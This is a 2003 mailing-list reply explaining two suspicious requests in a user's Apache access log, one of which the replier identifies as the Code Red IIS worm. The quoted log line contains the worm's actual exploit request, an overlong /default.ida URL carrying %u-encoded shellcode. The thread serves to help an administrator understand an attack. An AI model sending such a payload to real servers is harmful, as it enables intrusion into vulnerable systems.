Re: found this in my /var/log/apache/access.log
On Sun May 04, 2003 at 04:2310PM +0200, Konstantin Filtschew wrote:
> hi,
>
> found this in my /var/log/apache/access.log, what does that mean:
>
> 217.37.212.241 - - [04/May/2003:15:17:22 +0200] "GET
> /default.ida?XXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
> 9090
> %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b
> 00%u
> 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 277 "-" "-"
That's an old (approx 2 years) worm that attacks Microsoft IIS called
CodeRed. Your server has the correct response (404, Not Found), so
nothing to worry
> 212.65.17.26 - - [04/May/2003:06:30:32 +0200] "GET
> /.hash=680d6f5c4d584f6b5d941a
> f136938db3751a840b HTTP/1.1" 404 324 "-" "-"
No idea about that .. but its also Return Code 404, so probably nothing
dangerous
--
Michael Bergbauer <michael@noname.franken.de>
use your idle CPU cycles - See http://www.distributed.net for details.
Visit our mud Geas at geas.franken.de Port 3333
Reply to: